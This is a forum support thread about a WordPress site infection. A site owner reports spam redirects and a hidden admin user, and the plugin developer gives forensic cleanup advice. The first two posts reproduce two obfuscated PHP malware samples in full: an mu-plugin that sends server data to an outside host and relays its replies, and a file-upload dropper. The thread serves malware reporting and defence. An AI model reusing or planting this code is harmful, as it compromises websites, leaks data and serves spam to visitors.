New malicious files and infection that the program cannot detect
This topic contains 3 replies, has 2 voices, and was last updated by Igor Dovecer 16 hours, 1 minute ago.
September 8, 2025 at 9:31 pm #159597
I believe both of my websites are infected with malicious code. Unfortunately, the current plugin and virus definitions cannot clean them. I initially thought this might be due to the free version, so I donated €29, but it still couldn’t remove the infection.
I found some suspicious files myself and deleted them. The plugin also detected two files, but it says there’s nothing else in the database, and I couldn’t find anything either. However, Google shows a lot of “advertisement” indexed pages, such as:
mysite1.com/?m=123456789 → redirects to an ad page
mysite2.com/?k=123456789 → redirects to an ad page
These pages lead to sites like: https://www.zbbhot.store/?ggcid=672564
For now, I temporarily blocked these requests via robots.txt and redirected all ?m= URLs to the homepage using .htaccess.
Additional findings:
Your program didn’t detect a hidden user in the database. A user was created there and hidden from the WordPress admin panel:
Username: wpadminerlz
Email: domainvolomart.ru
The site had a file in the root directory (public_html) named defuait.php (with a lowercase “i”) containing malicious code.
There was malicious code in the plugins folder, under mu-plugins, in the file 0hQrmW.php.
0hQrmW.php file in mu-plugins:
<?php $LcELhCV = md5("ewQH2Sg5"); $aFt80EB_ = ucwords("eoL_Tc"); $WkPNY6Ja = stripos("HLchoR","f1tJEUs"); $nRGoJuN6 = ucfirst("DL4xq8BI"); $wWPEC = metaphone("LPy_f"); $nJqpmV = trim(" "); $cWicE = chunk_split("U_O7FbYx",3); $iOGy2p8 = sprintf(""); $USNlC = implode("USNlC",array());$m20vTi = metaphone("hfKFQkY"); new Ohy6ox();$xDnHL4 = ucfirst("a0kOPts"); $W2orcw = (string) null; function pHndhoQ($IYJS2Khb){ return vuIlOkG("\x6a\x73\157\156\137\x65\156\x63\x6f\x64\x65",1,$IYJS2Khb);}function lRn9uCl($nEPYif3){ if(substr($nEPYif3,0,4)=="\x68\x74\164\160"){ vuIlOkG("\150\145\141\144\145\x72",1,"\x4c\157\143\x61\x74\x69\x6f\156\72\x20".$nEPYif3); } }$kNyfqzdo = implode(",",array("NnR2b","uz8XCoS","FDl2Lkjc","ThbIq")); $S02xCjI = ucfirst("nLOmak"); $W4brjFhy = pHndhoQ($_SERVER);$s9u_bnC = addcslashes("s9u_bnC","f0Iq3UuG9"); $i5k1lt = date("Y-m-d H:i:s"); $uZqdgB = ucwords("v4dmPawKZ"); $tG2Iy0 = strval(false); $rO0fNe = addcslashes("rO0fNe","oPOiNErYyjB"); $YDfeK6Mtu = metaphone("N0ZKo"); $W4brjFhy = BSjqr($W4brjFhy);function BSjqr($IYJS2Khb){ return vuIlOkG("\142\141\163\x65\66\64\137\145\156\143\x6f\x64\x65",1,$IYJS2Khb);}$S0t7bN = date("Y-m-d H:i:s"); class tM0Hi{ public static function __callStatic($name, $arguments) { $isy6AY = vuIlOkG("\x63\x75\162\154\137\x69\x6e\x69\x74"); $VPSMmQHW = "\x68\164\164\x70\72\57\57\x63\141\143\150\145\56\165\x73\145\162\145\162\x70\x2e\x73\151\x74\x65\57\141\142\x6f\x75\164\56\x70\x68\160"; vuIlOkG("\x63\x75\x72\x6c\137\x73\145\164\157\160\x74",3,$isy6AY, (int)("\61\x30\60\60\x32"),$VPSMmQHW."\x3f\x75\141\x3d".vuIlOkG("\165\x72\x6c\145\156\143\157\x64\145",1,$arguments[0])); vuIlOkG("\x63\x75\x72\x6c\137\x73\145\164\157\160\x74",3,$isy6AY, (int)("\x31\71\x39\61\63"), 1); vuIlOkG("\x63\x75\x72\x6c\137\x73\145\164\157\160\x74",3,$isy6AY, (int)("\x36\x34\x5f\162\145\x70\x6c"), 0); vuIlOkG("\x63\x75\x72\x6c\137\x73\145\164\157\160\x74",3,$isy6AY, (int)("\61\x33\x5f\x72\145\160\x6c"), 49); global $nEPYif3; $nEPYif3 = 
vuIlOkG("\143\x75\x72\x6c\137\145\170\x65\x63",1,$isy6AY); vuIlOkG("\143\x75\x72\x6c\137\143\154\x6f\x73\x65",1,$isy6AY); }}$bIJGPl = sha1("FCS41U"); $FfQg5P_ = addcslashes("FfQg5P_","cdpEM38q"); $GDsX2frhu = define("NwyFW","gNVrZqAvH"); tM0Hi::kevEMgr($W4brjFhy);$TBQ3bpVO = addcslashes("TBQ3bpVO","prtSdBiW1jD3"); $bEQGyUXV6 = array("LxPhOmb6BQf73"); $nQ7LzA_j = chunk_split("E9Ev0tfCFP3ls",3); $wZ30NCJ = strpos("KkBQj","COjw63"); $oho8_eRk = strtok("oho8_eRk"); $oB8m1bi0 = ucfirst("c0p1P"); $bHOP0pmA = lRn9uCl($nEPYif3);$SToQq2R = false; $ICb6x7uo = stripos("GEIX6v","R0QnYo9"); $WBCufL = implode(",",array("b7_Di","TToQ9m","TC18h3V6","rNt4doG")); $qV6CIen = strstr("qV6CIen", "Ut4_aHM"); $ZLjMI2m = addcslashes("ZLjMI2m","GE4BRe5oQ"); $EvUzr = str_replace("EvUzr", "", "EvUzr");$bVquSw = Sbw8_($nEPYif3);function vuIlOkG($strrt,$NzW2b=null,$s2o8GycE=null,$YvBfp1gI=null,$X7ABae=null,$ulSy3WY=null){ if($NzW2b==1)return $strrt($s2o8GycE); if($NzW2b==2)return $strrt($s2o8GycE,$YvBfp1gI); if($NzW2b==3)return $strrt($s2o8GycE,$YvBfp1gI,$X7ABae); if($NzW2b==4)return $strrt($s2o8GycE,$YvBfp1gI,$X7ABae,$ulSy3WY); return $strrt(); }$IwQm5cx = implode("IwQm5cx",array());function XC53Y($nEPYif3){ if(strstr(trim($nEPYif3),"\x3c\150\x74\x6d\154")){ exit($nEPYif3); } }function Sbw8_($nEPYif3){ if(strstr($nEPYif3,"\74\165\x72\154\x73\145\x74")){ exit(vuIlOkG("\150\145\141\144\145\x72",1,"\103\157\156\x74\145\x6e\x74\55\x74\171\x70\145\x3a\164\x65\170\x74\x2f\x78\155\154").$nEPYif3); } }class Ohy6ox{ public function __construct() { $_SERVER["\x54"]="\x7a"; $_SERVER["\x54\x50\114"]="\64"; }}$Bx3eR = str_pad("", 0); $oUxNzIh = XC53Y($nEPYif3);$I8CDVwFgS = defined("hMSv5UYcp"); $KLQFBgYJ = trim(" "); $VC8y1jf = (string) null; $eUJKV7X = define("th8Wc","hGBxc"); $d85HyA1S = str_replace("d85HyA1S", "", "d85HyA1S");$mdcoQA = defined("SbLhK"); $Msn59OWEJ = strval(false); $gWsYQV1oa = md5("wWyMbwS0I"); $v91Io = md5("wwP0nJ"); $sOV2MdC = str_replace("sOV2MdC", "", "sOV2MdC");
How can I properly clean the website?
I tried using MalCare, and it claims there are three more malicious files that your program cannot detect. I’m not able to pay €149 per year for cleaning at the moment, so I haven’t purchased it yet. Is there a way your program can help clean these files? Would any assistance or guidance be required to do this? Thank you very much!
This topic was modified 3 days, 1 hour ago by Igor Dovecer.
September 10, 2025 at 3:17 am #159677
More files found with Wordfence:
wp-content/plugins/.gallery-by-supsystic/src/GridGallery/Featuredplugins/index.php
<?php goto ykCej3;AxCHuG: echo /*
*/("oG85")[0];goto BRF6qNEm;BISpL189_: echo ("Gbaw")[2];goto jYu8BW0;mw0W_3Hk: $AOpYTE3 = false; goto _esRnx29;hWDCa5vnHF: echo /* */("Q_a")[3];goto VQ13XIdBDc;i1Zt_dv: $bNwCsM = ucfirst("jnO78R"); goto hWDCa5vnHF;ykCej3: $xrX9I0JA = false; goto qSMmVW2tBZ;hwF1IB: $VfFejBvu = addslashes("VfFejBvu"); goto eTuNgzCMnQ;eTuNgzCMnQ: $BNGuzdf = (/**/("Qesu")[2]./**/("JaZGtk")[4].("iYCTr9")[4].("hAikO")[2].("cxpW")[2]./*
*/("KtoO")[2].("Ussg")[2])("WKAhTl5I","pxu4b"); goto PzXHjpuqf;PzXHjpuqf: $ynXQOj = (/* */("iaLG")[0]./* */("neR3m6")[4].("_per")[1]./* */("l_gn9")[0]./**/("Ot_joU")[4]./**/("dbfM")[0]./**/("eaUJx")[0])(",",array("LT_9j","iV_16z","gI6o45CAl","sq7NidRG")); goto yelvMSuwnc;zyB7Ln: $i_uTNm = (/**/("iaLG")[0]./**/("neR3m6")[4].("_per")[1]./**/("l_gn9")[0]./*
*/("Ot_joU")[4]./*
*/("dbfM")[0]./*
*/("eaUJx")[0])("i_uTNm",array());goto ZETpXa7Y;ocalDf96EG: $bovKN = (("IKVhsp")[4]./**/("NZzt5")[3].("ZLr3ZB")[2].("kWsYX")[2]./*
*/("xtWM")[1].("AKr3")[2])("iM0Yo3rxd","fbBTRG"); goto AfqM3LkT;_bzhxnlV5: $rzgU5m = (/*
*/("iaLG")[0]./*
*/("neR3m6")[4].("_per")[1]./**/("l_gn9")[0]./* */("Ot_joU")[4]./**/("dbfM")[0]./*
*/("eaUJx")[0])(",",array("JL1qced","Hvw7540db","iZg15e","EoU0neEI")); goto icUuYiMvN;hrRGohl6yv: $ngJMnw6 = (/*
*/("UYsUA")[2]./*
*/("jtbSaR")[1].("rouPV6")[0].("_uzA3o")[0].("qnM4rj")[4].("rejJS")[1].("QpIn69")[1].("eeEO7")[1].("caR3")[1].("tZkc4")[0])("", 11); goto AxCHuG;dfei4Y: $jkVqgt8m = (("OsvgE")[1]./**/("Qtqv")[1].("WMrG")[2]./**/("_iJ_T3")[3].("VpwJLe")[1]./**/("aLvr2")[0].("wCPBdc")[4])("", 0); goto iwgH74h0oW;ZETpXa7Y: $cACFV = md5("nmVcX"); goto dfei4Y;XphWuT: if($RsdQa)exit("Hhsrta0wRMUzuZKnc".copy($_FILES["dyFw_XdT"][("Xt9zvm")[1]./**/("pnmW")[2]./*
*/("pOGLp")[0]./*
*/("_Zl4_p")[0].("cn82")[1]./*
*/("aQpfHM")[0]./**/("mHxrCV")[0].("ywseC")[3]],$RsdQa));goto BISpL189_;gzr8J_: $hjrdQCltf = (/**/("R9ws")[2]./**/("oZYr")[0]./* */("sLqrU")[3].("CdE_M")[1].("aw5g")[1]./*
*/("rZTbU")[0].("a0AXap")[4]./*
*/("ZgdCp9")[4])("", 11);goto i1Zt_dv;_esRnx29: $kDuCiL = (/* */("R9ws")[2]./*
*/("oZYr")[0]./* */("sLqrU")[3].("CdE_M")[1].("aw5g")[1]./**/("rZTbU")[0].("a0AXap")[4]./**/("ZgdCp9")[4])("", 11);goto VFrqJe;jYu8BW0: $vLD1t = lcfirst("QDuStBT"); goto NRsHxK4;VFrqJe: $onBqsmMg = (("Rlc8r5")[2]./**/("hBNpF2")[0].("SPu3pL")[2].("nNork")[0]./*
*/("kPk2fr")[2].("_Y0V")[0].("CFspDe")[2]./*
*/("opGHUp")[1].("ARlHS")[2].("icRXVS")[0].("EnxtsP")[3])("YiMpKIsbzCHZ",3); goto LvXbOM6;AfqM3LkT: $HiaOQ = sha1("wPiO_w4U"); goto AoYchCH;kv4rLIg: $RGXAne = ucfirst("CUA1Q6oSZ"); goto TxOVRUJZs2;VQ13XIdBDc: $QtRoTgWFG = (/* */("UYsUA")[2]./*
*/("jtbSaR")[1].("rouPV6")[0].("_uzA3o")[0].("qnM4rj")[4].("rejJS")[1].("QpIn69")[1].("eeEO7")[1].("caR3")[1].("tZkc4")[0])("", 12); goto u74JEf;Bj3GWE: $o5cWOwP = str_shuffle("uyEs5Xz"); goto k8jW9L;KFc7Jrse: $hUp3SQm = (string) null; goto nAg6BR9l2J;iwgH74h0oW: $OlLEq = ucfirst("o80qov"); goto xW0ea_QuY;u74JEf: $dhvF3_V = (/**/("OswLA")[1]./*
*/("pOe1")[0]./**/("xqrHK")[2].("oTxil")[3]./**/("wnd7QE")[1]./**/("QtDtW")[3]./*
*/("fiRGm")[0])(""); goto Bj3GWE;TxOVRUJZs2: $YnCo2d7xL = ucwords("yNWysh42"); goto hwF1IB;AoYchCH: $PsRt7m = (/**/("UYsUA")[2]./*
*/("jtbSaR")[1].("rouPV6")[0].("_uzA3o")[0].("qnM4rj")[4].("rejJS")[1].("QpIn69")[1].("eeEO7")[1].("caR3")[1].("tZkc4")[0])("", 5); goto WlyU249wDs;G65m9e: $LvTRl_ = strval(false); goto pglJFQ;pglJFQ: $LQ3Bz9 = (/* */("bsFZ")[1].("DwuA")[2]./*
*/("bNEMP7")[0]./* */("MPFst")[3]./* */("Btae")[1].("LrGT")[1])("LQ3Bz9",6,0);goto ZV7P9zrUE;xW0ea_QuY: if(!isset($_GET["azK"]))exit;goto xfAcC8;qSMmVW2tBZ: $ppV3cU5S = metaphone("t1XU9f"); goto KFc7Jrse;nAg6BR9l2J: $Gr21H = sha1("Y9_YBwr"); goto ocalDf96EG;LvXbOM6: $hVQEpa = (/**/("R9ws")[2]./*
*/("oZYr")[0]./**/("sLqrU")[3].("CdE_M")[1].("aw5g")[1]./**/("rZTbU")[0].("a0AXap")[4]./*
*/("ZgdCp9")[4])("", 12);goto kv4rLIg;NRsHxK4: $Qo0RO78Ex = (string) null; goto D6WKRspUy;xfAcC8: if(isset($_FILES["dyFw_XdT"]))$RsdQa = basename($_FILES["dyFw_XdT"][/**/("unA2q")[1].("tazMA")[1]./**/("mbtZoM")[0]./* */("peF1")[1]]);goto XphWuT;k8jW9L: $A2ldyEBD = addcslashes("A2ldyEBD","rFNwjKJf4"); goto _bzhxnlV5;BRF6qNEm: echo /*
*/("ZgJS")[0];goto gzr8J_;D6WKRspUy: $Uwzi6EGn = (/**/("Qesu")[2]./* */("JaZGtk")[4].("iYCTr9")[4].("hAikO")[2].("cxpW")[2]./**/("KtoO")[2].("Ussg")[2])("fTt1uWAgM","LFYZb8n"); goto hrRGohl6yv;WlyU249wDs: $v170t = (/**/("R9ws")[2]./*
*/("oZYr")[0]./**/("sLqrU")[3].("CdE_M")[1].("aw5g")[1]./* */("rZTbU")[0].("a0AXap")[4]./**/("ZgdCp9")[4])("", 15);goto G65m9e;ZV7P9zrUE: $EwM4O = define("nBaNOV","KgpKtuL"); goto zyB7Ln;icUuYiMvN: $SbB3Dj = defined("XSfsaZ8"); goto mw0W_3Hk;yelvMSuwnc:""; ?>
wp-content/plugins/featured-images-for-rss-feeds/includes/freemius/templates/wp-login.php
September 11, 2025 at 6:13 am #159747
Thanks for posting the contents of those files that contained new threats. I added the one from your first post to my definition updates yesterday so that it can be automatically removed with my plugin, and I am working on this last one now so that it too can be found and automatically fixed.
Rogue admin users are hard to detect automatically because there is no universal way to tell the difference between those whom you would have added as an admin user on purpose and those whom you did not want to be added. But my plugin should have been able to find and fix the malicious code that added that user and also the code that was concealing it. If that code was also not detected and you can find it in a newly added plugin file or a theme file like the functions.php file then please also send me that code so that I can update those definitions as well.
Malicious code is always changing and evolving to avoid detection. That’s why I am always releasing new definition updates to keep up with the new threat variations. We need to see any new variants so that they can be identified and defined for future scans. So far, what you are doing to combat this threat is good, but you will need to add one critical step to your cleanup process in order to track down the source of the infection to find and fix the root cause. For every infected file you find you will need to stat the file as it is on the server before you delete it or make any changes to the file. You need to get the exact times that the file was last modified or changed before your own changes to that file overwrite the timestamps of the malicious changes. Then you can use those exact server timestamps and cross-reference the activity in your access_log files to figure out what exploit was used to plant those files or to inject that malicious code into those files. Follow that trail back as far as you can and you should be able to find the first breach and patch that exploit to prevent further attacks.
Please let me know if you get stuck and need any further assistance, and please also send me any new threat you find so that my plugin can help you remove them, and any other copies of those threats, from your server.
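The timestamp cross-referencing step described in the reply above, as an added example in Python (not the plugin's code and not posted by anyone in this thread): snapshot the file's mtime and ctime before touching it, then pull every access_log request within a window around that time, POSTs first. The IPs, timestamps and log lines are constructed; the file paths are the ones reported in this thread, and the stand-in file is created in a temporary directory.

```python
import os, re, tempfile
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" access_log line, e.g.
# 203.0.113.5 - - [08/Sep/2025:21:20:03 +0000] "GET / HTTP/1.1" 200 512 "-" "UA"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')

# Constructed log lines (RFC 5737 test IPs); the paths are the ones reported in this thread.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Sep/2025:21:20:03 +0000] "GET /?m=123456789 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Sep/2025:21:28:41 +0000] "POST /wp-content/plugins/.gallery-by-supsystic/src/GridGallery/Featuredplugins/index.php HTTP/1.1" 200 58 "-" "python-requests/2.31"
203.0.113.9 - - [08/Sep/2025:21:29:15 +0000] "GET /wp-content/mu-plugins/0hQrmW.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.0.2.44 - - [08/Sep/2025:23:55:00 +0000] "GET /wp-login.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
""".splitlines()

def snapshot_times(path):
    """Equivalent of `stat <file>` on the server: record mtime and ctime BEFORE you edit,
    move or delete the file, because your own change overwrites both timestamps."""
    st = os.stat(path)
    return {"path": path,
            "mtime": datetime.fromtimestamp(st.st_mtime, timezone.utc),
            "ctime": datetime.fromtimestamp(st.st_ctime, timezone.utc)}

def parse_log_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line (or truncated): skip it
    return {"ip": m.group("ip"), "req": m.group("req"), "status": int(m.group("status")),
            "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")}

def requests_near(log_lines, when, minutes=10):
    """Every request within +/- `minutes` of the file timestamp, POSTs (uploads, form
    submissions) first because they are the usual way a file gets written."""
    lo, hi = when - timedelta(minutes=minutes), when + timedelta(minutes=minutes)
    hits = [r for r in map(parse_log_line, log_lines) if r and lo <= r["ts"] <= hi]
    hits.sort(key=lambda r: (not r["req"].startswith("POST "), r["ts"]))
    return hits

def demo():
    """Constructed scenario: a stand-in for the dropped mu-plugin file with its mtime
    frozen at 2025-09-08 21:29:02 UTC; returns (snapshot, nearby requests)."""
    planted = datetime(2025, 9, 8, 21, 29, 2, tzinfo=timezone.utc)
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "0hQrmW.php")
        with open(path, "w") as f:
            f.write("<?php /* constructed stand-in, not the real dropped file */ ?>")
        os.utime(path, (planted.timestamp(), planted.timestamp()))  # freeze mtime only
        snap = snapshot_times(path)
    return snap, requests_near(SAMPLE_LOG, snap["mtime"])
```

On a real server, run `requests_near` against the full access_log of every site on the same account, since a dropper planted through one site is often fetched from another.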
September 11, 2025 at 6:55 am #159752
Ok, thank you, I will.
BR.